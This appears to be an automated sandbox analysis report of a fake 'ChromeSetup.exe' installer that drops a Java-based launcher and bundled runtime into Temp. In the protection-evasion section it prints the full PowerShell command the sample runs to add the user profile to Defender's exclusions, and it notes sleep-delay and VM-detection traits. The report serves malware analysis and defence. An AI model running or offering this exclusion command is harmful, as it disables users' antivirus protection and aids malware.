Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\README.txt Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\ChromeSetup.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5946
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3763
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmid.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\client\jvm.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\verify.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfr.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\msvcr100.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunmscapi.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaws.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jdwp.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_common.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_socket.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\instrument.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java-rmi.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\resource.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2native.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\splashscreen.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fxplugins.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\eula.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java_crw_demo.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge-32.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\nio.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_d3d.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssv.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\servertool.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\lcms.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\tnameserv.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunec.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\UAC.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fontmanager.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\deploy.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\hprof.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jjs.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jawt.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsound.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2iexp.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_iio.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxwebkit.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_sw.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\decora_sse.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\net.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glib-lite.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jli.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pkcs11.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jabswitch.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcp120.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glass.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr120.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kinit.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\bci.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\npt.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\Intel_Processor_Identification_Utility-Legacy.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.cpl Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jaas_nt.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsdt.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\w2k_lsa_auth.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jpeg.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\policytool.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\awt.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\npdeployJava1.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\keytool.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\orbd.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\zip.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font_t2k.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2ssv.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmiregistry.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssvagent.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pcsc.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kcms.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge-32.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\deployJava1.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ktab.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_shmem.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsoundds.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\klist.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\npjp2.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack200.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\NAct.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge-32.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\t2k.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\management.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2launcher.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\mlib_image.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\pack200.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\wsdetect.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxmedia.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\gstreamer-lite.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dcpr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 516 Thread sleep count: 5946 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5176 Thread sleep count: 3763 > 30
Source: C:\Windows\System32\svchost.exe TID: 5304 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1976 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\lib\deploy
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: l{constant pool}code cache C-heap hand metaspace chunks dict zone strs syms heap threads [Verifying Genesis-2147483648Unable to link/verify Finalizer.register methodUnable to link/verify ClassLoader.addClass methodProtectionDomain.impliesCreateAccessControlContext() has the wrong linkageUnable to link/verify Unsafe.throwIllegalAccessError methodJava heap space: failed reallocation of scalar replaced objectsGC overhead limit exceededRequested array size exceeds VM limitCompressed class spaceJava heap spaceUnable to link/verify VirtualMachineError classC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\oops\arrayKlass.cpp[]guarantee(component_mirror()->klass() != NULL) failedshould have a classC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\gc_interface/collectedHeap.inline.hpp - length: %dguarantee(a->length() >= 0) failedarray with negative length?guarantee(obj->is_array()) failedmust be arrayshould be klassguarantee(is_constantPool()) failedvtable restored by this call<pseudo-string> cache=0x%08x (extra) for /operands[%d]/preresolutionconstant pool [%d]A constant pool lockC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\oops\constantPool.cppguarantee(!ConstantPool::is_invokedynamic_index(which)) failedan invokedynamic instruction does not have a klassRESOLVE %s %s
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp, classlist.0.dr Binary or memory string: java/lang/VirtualMachineError
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: Unable to link/verify VirtualMachineError class
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000002.00000002.3383842024.0000000002750000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000002.00000002.3383842024.0000000002750000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t[Ljava/lang/VirtualMachineError;
Source: svchost.exe, 00000007.00000002.2860824933.000001C7D6C54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2860164381.000001C7D162B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )Q+com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: _well_known_klasses[SystemDictionary::VirtualMachineError_klass_knum]
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000002.00000002.3383842024.0000000002750000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lVirtualMachineError.java
Source: javaw.exe, 00000002.00000002.3382950654.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\ChromeSetup.exe Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Code function: 1_2_00401150 SetUnhandledExceptionFilter,__getmainargs,_iob,_iob,_setmode,_iob,_iob,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess, 1_2_00401150
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Memory protected: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
